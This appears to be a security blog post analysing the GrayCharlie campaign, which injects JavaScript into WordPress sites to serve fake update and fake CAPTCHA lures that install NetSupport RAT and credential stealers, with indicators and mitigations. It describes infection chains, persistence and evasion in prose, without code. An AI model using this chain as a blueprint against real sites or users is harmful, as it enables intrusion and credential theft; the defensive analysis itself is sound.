Posted in

GrayCharlie Injects Malicious JavaScript to Deliver NetSupport RAT

by Rakesh0

Website compromise is no longer just about defacement or SEO spam. A threat actor known as GrayCharlie has been silently hijacking legitimate WordPress websites since mid-2023 — weaponizing them to distribute NetSupport RAT, Stealc, and SectopRAT malware.

Instead of attacking victims directly, GrayCharlie injects malicious JavaScript into trusted WordPress sites, turning them into malware delivery platforms. The result? Drive-by infections affecting law firms, enterprises, and users worldwide — with the United States as the primary target.

For CISOs, SOC analysts, DevOps teams, and IT managers, this campaign highlights a growing risk:

Your website can become someone else’s malware distribution network.

In this deep-dive analysis, we examine:

  • How GrayCharlie compromises WordPress sites
  • The full infection chain delivering NetSupport RAT
  • Infrastructure patterns and supply-chain risks
  • Detection and mitigation strategies aligned with modern threat detection frameworks

Who Is GrayCharlie?

GrayCharlie is a financially motivated threat actor overlapping with the previously tracked SmartApeSG cluster (also known as ZPHP or HANEMONEY).

Key Characteristics

  • Active since mid-2023
  • Targets WordPress-powered websites
  • Primary malware: NetSupport RAT
  • Secondary payloads: Stealc (credential stealer), SectopRAT
  • Heavy targeting of U.S. organizations
  • Suspected Russian-speaking operators

Infrastructure analysis links backend systems primarily to:

  • MivoCloud
  • HZ Hosting Ltd

Researchers identified two main C2 clusters distinguished by:

  • TLS certificate naming patterns
  • License keys and serial numbers
  • Distinct infrastructure deployment timelines throughout 2025

Primary Malware: NetSupport RAT

Originally a legitimate remote administration tool, NetSupport Manager has long been abused by threat actors.

When deployed maliciously, NetSupport RAT allows attackers to:

  • Execute remote commands
  • Capture screens
  • Transfer files
  • Conduct system reconnaissance
  • Deploy additional payloads

GrayCharlie extends this with:

  • Stealc → Credential theft from browsers and crypto wallets
  • SectopRAT → Expanded remote administration capabilities

This modular approach increases operational flexibility and long-term persistence.

How GrayCharlie Compromises WordPress Sites

The group’s core technique is malicious JavaScript injection into legitimate WordPress websites.

Step 1: DOM Injection

Attackers insert a <script> tag into the site’s Document Object Model (DOM).

The script:

  • Points to attacker-controlled infrastructure
  • Loads external JavaScript dynamically
  • Executes silently when visitors open the page

This avoids obvious visual changes to the site.

Step 2: Victim Profiling

The injected JavaScript:

  • Profiles browser type
  • Detects operating system
  • Evaluates environment suitability

Based on profiling, the victim is served one of two social engineering lures:

  1. Fake Browser Update
  2. ClickFix-style Fake CAPTCHA

Both techniques rely on user execution, bypassing many automated defenses.

Infection Chain 1: Fake Browser Update

When a victim interacts with the fake update:

  1. JavaScript executes via WScript
  2. WScript spawns PowerShell
  3. PowerShell downloads and extracts NetSupport RAT
  4. Files are written to: %AppData%
  5. Persistence mechanisms are established

This chain leverages legitimate Windows scripting tools, blending malicious activity with normal administrative behavior.

Infection Chain 2: ClickFix Fake CAPTCHA

The ClickFix variant is even more deceptive:

  1. User copies and pastes attacker-provided command
  2. Command retrieves malicious batch file
  3. NetSupport RAT is installed
  4. Registry Run key added for persistence

This is a classic example of:

Social engineering combined with Living-off-the-Land (LotL) techniques

Command-and-Control Infrastructure

GrayCharlie maintains stealthy communications:

  • C2 over TCP port 443
  • SSH management of staging servers
  • TLS certificates mimicking legitimate naming patterns

Because traffic uses standard HTTPS ports, it blends with normal encrypted traffic — complicating network-level detection.

Two distinct C2 clusters were identified, indicating operational segmentation and redundancy.

Supply Chain Angle: Law Firm Compromise

One of the most concerning findings involves U.S. law firms.

At least 15 law firm websites were injected with identical malicious JavaScript pointing to the same attacker domain.

Researchers believe the compromise may have originated via:

  • A supply-chain attack
  • Involving SMB Team, an IT services provider serving multiple law firms

Stolen credentials linked to an SMB Team email account surfaced around the time the malicious infrastructure was activated.

This suggests:

A single third-party compromise can cascade across dozens of client websites.

Industries Impacted

While attacks span multiple sectors globally, high-impact targets include:

  • Law firms
  • Professional services
  • Small and mid-sized enterprises
  • Organizations relying heavily on WordPress

The United States remains the most frequent target region.

Technical Indicators & Detection Opportunities

Security teams should monitor for:

WordPress-Level Indicators

  • Unauthorized <script> tags injected into page templates
  • Unknown external JavaScript domains
  • File integrity changes in theme or plugin directories
  • Unexpected admin logins

Endpoint-Level Indicators

  • WScript spawning PowerShell
  • PowerShell downloading external content
  • NetSupport client installation in AppData
  • Registry Run key persistence
  • Execution of Stealc or SectopRAT payloads

MITRE ATT&CK Mapping

GrayCharlie techniques align with:

  • T1059 – Command and Scripting Interpreter
  • T1218 – Signed Binary Proxy Execution
  • T1547 – Boot or Logon Autostart Execution
  • T1195 – Supply Chain Compromise
  • T1027 – Obfuscated/Encoded Files

Mapping these behaviors improves detection engineering within SIEM and EDR platforms.

Why This Campaign Is Dangerous

  1. Trusted website abuse lowers user suspicion
  2. No phishing email required
  3. Browser profiling increases infection success rate
  4. Use of legitimate tools evades detection
  5. Supply-chain exposure amplifies impact

This campaign highlights the convergence of:

  • Web application compromise
  • Endpoint malware deployment
  • Infrastructure-level operational discipline

Mitigation and Defense Strategy

1. Secure WordPress Infrastructure

  • Enable file integrity monitoring
  • Use Web Application Firewalls (WAF)
  • Disable unused plugins and themes
  • Restrict admin access via IP allowlisting
  • Enforce MFA for all admin accounts

2. Monitor for DOM Injection

  • Scan WordPress pages for unauthorized external scripts
  • Implement CSP (Content Security Policy)
  • Regularly audit JavaScript dependencies

3. Endpoint Hardening

  • Block WScript where unnecessary
  • Restrict PowerShell execution
  • Deploy EDR with behavioral analytics
  • Monitor registry Run keys

4. Threat Intelligence Integration

  • Block known GrayCharlie IPs and domains
  • Deploy YARA, Snort, and Sigma rules
  • Feed IOCs into SIEM platforms

5. Supply Chain Risk Management

  • Audit third-party IT vendors
  • Enforce credential hygiene
  • Monitor for leaked credentials
  • Implement zero trust vendor access controls

Common Mistakes Organizations Make

  • Assuming WordPress is secure by default
  • Failing to monitor DOM-level changes
  • Allowing unrestricted scripting tools
  • Ignoring third-party IT provider risks
  • Relying only on signature-based AV

FAQs

1. What is GrayCharlie?

GrayCharlie is a threat actor group compromising WordPress sites to distribute NetSupport RAT, Stealc, and SectopRAT malware.

2. How does the infection begin?

Through malicious JavaScript injected into legitimate WordPress websites, which serves fake updates or CAPTCHA lures.

3. What is NetSupport RAT?

A legitimate remote administration tool abused by attackers to gain remote control over infected systems.

4. Why are law firms targeted?

Law firms store sensitive client and litigation data, making them valuable espionage and financial targets.

5. How can organizations detect DOM injection?

Through file integrity monitoring, CSP enforcement, JavaScript auditing, and anomaly detection in web traffic.

Key Takeaways

  • GrayCharlie weaponizes legitimate WordPress websites.
  • NetSupport RAT remains the primary payload.
  • Stealc and SectopRAT expand credential theft and control.
  • Supply-chain compromise increases impact radius.
  • Proactive web and endpoint monitoring is essential.

Conclusion

The GrayCharlie campaign demonstrates how modern threat actors blend web compromise, social engineering, and remote access malware into scalable operations.

Organizations must recognize that:

Website security is endpoint security.

A compromised WordPress site can silently infect thousands of visitors — turning brand trust into an attack vector.

Now is the time to:

  • Audit WordPress infrastructure
  • Deploy behavioral endpoint detection
  • Enforce supply-chain security standards
  • Integrate dynamic threat intelligence

Preventing drive-by malware distribution requires vigilance at every layer — from web server to endpoint.

Subscribe

Leave a Reply

Your email address will not be published. Required fields are marked *